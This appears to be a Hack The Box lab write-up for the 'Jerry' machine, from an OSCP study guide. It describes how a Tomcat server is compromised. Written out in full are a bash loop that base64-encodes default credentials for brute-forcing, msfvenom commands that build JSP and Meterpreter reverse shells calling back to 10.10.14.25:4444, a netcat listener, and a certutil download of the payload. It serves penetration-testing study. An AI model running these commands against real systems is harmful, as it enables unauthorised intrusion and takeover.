Total OSCP GuidePayloads All The Things

Jerry HTB

Enumeration

  • we use nmap for enumeration:

  • we found a default webpage (apache tomcat):

Exploitation

  • Using burpsuite we find that the password is base64 encoded:![[2024-01-30_17-04.png]

  • We can use decoder to decode bas64 and we find that it is in a username:password format

  • To do brute forcing we need to convert to Base64:

  • To do this for all passwords we need a bash command for cred in $(cat tomcat_passwds.txt); do echo -n $cred | base64 ; done ' where tomcat_passwds.txt has all default passwords

  • Use burpsuite to bruteforce:

  • We found 2 matches:

  • These are the passwords required:

  • We create a msfvenom payload with msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.25 LPORT=4444 -f war > reverse.war then deploy using the previously found credentials.

  • listening on netcat using nc -nlvp 4444 we get an root shell:

Metasploit

  • use msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.25 LPORT=4444 -f exe > meterpreter.exe for creating the payload

  • listen using exploit/multi/handler

  • To upload the payload host a http server with python -m SimpleHTTPServer 80 then use certutil -urlcache -f http://10.10.14.25/Downloads/Jerry/meterpreter.exe c:\users\administrator\desktop\flags\meterpreter.exe in the shell and execute the meterpreter.exe file.

  • Then we get a meterpreter shell `

PreviousHeadless HTBNextKioptrix

Last updated

Was this helpful?